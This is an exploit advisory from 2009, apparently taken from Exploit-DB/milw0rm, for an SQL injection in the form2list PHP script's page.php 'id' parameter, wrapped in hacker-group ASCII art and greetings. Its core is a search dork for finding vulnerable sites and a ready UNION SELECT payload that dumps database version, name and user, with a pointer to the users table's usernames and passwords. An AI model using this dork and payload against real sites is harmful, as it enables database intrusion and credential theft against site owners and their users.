form2list - 'page.php?id' SQL Injection

EDB-ID:

8348

CVE:

N/A


Platform:

PHP

Published:

2009-04-03

*********************************************************************************************       
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
       BadBoy From : Institut Privé Des Enseignement TeChnique Et Informatique "IPETI"
---------------------------------------------------------------------------------------------
=             form2list (page.php)  (id) Remote SQL injection Vulnerability                 =
---------------------------------------------------------------------------------------------
                                  SeCuriTy Is NoNe
---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.sql-w0rm.Org                                                =-
-===========================================================================================-
---------------------------------------------------------------------------------------------
-
- Script home : www.form2list.com
-
-
- Dork : Powered By form2list
-
-
- Exploit : [Target]/page.php?id=[SQL]
-
-         : [Target]/page.php?id=-1+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5,6,7,8--
-
-
- you can see all informations in source page
-
- users::username
- users::password
-
-
---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=                          Hussin X , CraCkEr , Sakab , xXx                               =-
-=                                                                                         =-
-=                            TrYaG , WwW.No-ExploiT.Com                                   =-
-=                                                                                         =-
-=                              AnA MaGhribi Den MouK                                      =-
-===========================================================================================-

# milw0rm.com [2009-04-03]